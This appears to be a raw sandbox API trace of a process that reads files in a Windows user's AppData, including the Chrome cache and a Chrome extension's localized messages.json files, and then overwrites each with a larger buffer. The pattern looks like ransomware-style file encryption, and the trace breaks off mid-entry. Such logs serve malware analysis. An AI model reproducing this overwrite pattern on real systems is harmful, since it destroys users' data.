0x49c [0137.871] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.871] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.871] ReleaseMutex (hMutex=0x168) returned 1 [0137.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACECache11.lst", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACECache11.lst", cchWideChar=14, lpMultiByteStr=0x1f7320c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACECache11.lst", lpUsedDefaultChar=0x0) returned 14 [0137.871] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x49c, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x2b1f2bc*=0x49c, lpOverlapped=0x0) returned 1 [0137.873] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0137.873] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa24, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa24, lpOverlapped=0x0) returned 1 [0137.874] CloseHandle (hObject=0x1cc) returned 1 [0137.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0137.875] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.875] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x560 [0137.875] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.875] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.876] ReleaseMutex (hMutex=0x168) returned 1 [0137.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap_unsigned.manifest", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0137.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap_unsigned.manifest", cchWideChar=37, lpMultiByteStr=0x1fa53fc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clickonce_bootstrap_unsigned.manifest", lpUsedDefaultChar=0x0) returned 37 [0137.876] ReadFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8, nNumberOfBytesToRead=0x560, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesRead=0x2b1f2bc*=0x560, lpOverlapped=0x0) returned 1 [0137.939] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0137.939] WriteFile (in: hFile=0x1cc, lpBuffer=0x25adcd8*, nNumberOfBytesToWrite=0xae8, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25adcd8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xae8, lpOverlapped=0x0) returned 1 [0137.939] CloseHandle (hObject=0x1cc) returned 1 [0137.940] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0137.941] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.941] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb000 [0137.941] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0137.941] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.941] ReleaseMutex (hMutex=0x168) returned 1 [0137.941] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_0", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0137.942] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="data_0", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="data_0", lpUsedDefaultChar=0x0) returned 6 [0137.942] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0137.971] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa000 [0137.971] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0137.971] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa000 [0137.971] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0137.972] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0137.972] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0137.973] CloseHandle (hObject=0x1cc) returned 1 [0137.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.267] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.267] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x10 [0139.267] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.267] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.267] ReleaseMutex (hMutex=0x168) returned 1 [0139.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0139.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CURRENT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CURRENT", lpUsedDefaultChar=0x0) returned 7 [0139.267] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f73288, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f73288*, lpNumberOfBytesRead=0x2b1f2bc*=0x10, lpOverlapped=0x0) returned 1 [0139.269] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.269] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x598, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x598, lpOverlapped=0x0) returned 1 [0139.870] CloseHandle (hObject=0x1d8) returned 1 [0139.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.871] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.871] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x29 [0139.871] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.871] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.871] ReleaseMutex (hMutex=0x168) returned 1 [0139.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0139.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MANIFEST-000001", cchWideChar=15, lpMultiByteStr=0x1f732cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MANIFEST-000001", lpUsedDefaultChar=0x0) returned 15 [0139.871] ReadFile (in: hFile=0x1d8, lpBuffer=0x1fa55f0, nNumberOfBytesToRead=0x29, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa55f0*, lpNumberOfBytesRead=0x2b1f2bc*=0x29, lpOverlapped=0x0) returned 1 [0139.872] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.873] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5b1, lpOverlapped=0x0) returned 1 [0139.873] CloseHandle (hObject=0x1d8) returned 1 [0139.873] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.874] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.874] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe0 [0139.874] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.874] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.874] ReleaseMutex (hMutex=0x168) returned 1 [0139.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.875] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c5048, nNumberOfBytesToRead=0xe0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5048*, lpNumberOfBytesRead=0x2b1f2bc*=0xe0, lpOverlapped=0x0) returned 1 [0139.876] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.876] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa3d8*, nNumberOfBytesToWrite=0x668, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25aa3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x668, lpOverlapped=0x0) returned 1 [0139.876] CloseHandle (hObject=0x1d8) returned 1 [0139.876] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.877] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.877] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xdd [0139.877] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.877] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.877] ReleaseMutex (hMutex=0x168) returned 1 [0139.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.878] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.878] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c5048, nNumberOfBytesToRead=0xdd, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c5048*, lpNumberOfBytesRead=0x2b1f2bc*=0xdd, lpOverlapped=0x0) returned 1 [0139.879] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.879] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa3d8*, nNumberOfBytesToWrite=0x665, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25aa3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x665, lpOverlapped=0x0) returned 1 [0139.879] CloseHandle (hObject=0x1d8) returned 1 [0139.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.880] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.880] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xd0 [0139.880] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.880] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.880] ReleaseMutex (hMutex=0x168) returned 1 [0139.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.881] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xd0, lpOverlapped=0x0) returned 1 [0139.882] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.882] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x658, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x658, lpOverlapped=0x0) returned 1 [0139.883] CloseHandle (hObject=0x1d8) returned 1 [0139.883] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xcb [0139.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.884] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.884] ReleaseMutex (hMutex=0x168) returned 1 [0139.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.884] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xcb, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xcb, lpOverlapped=0x0) returned 1 [0139.886] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.886] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x653, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x653, lpOverlapped=0x0) returned 1 [0139.886] CloseHandle (hObject=0x1d8) returned 1 [0139.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0139.887] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.887] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x104 [0139.887] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0139.887] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.887] ReleaseMutex (hMutex=0x168) returned 1 [0139.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0139.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0139.888] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb0e8, nNumberOfBytesToRead=0x104, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb0e8*, lpNumberOfBytesRead=0x2b1f2bc*=0x104, lpOverlapped=0x0) returned 1 [0139.889] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0139.889] WriteFile (in: hFile=0x1d8, lpBuffer=0x25aa3d8*, nNumberOfBytesToWrite=0x68c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25aa3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x68c, 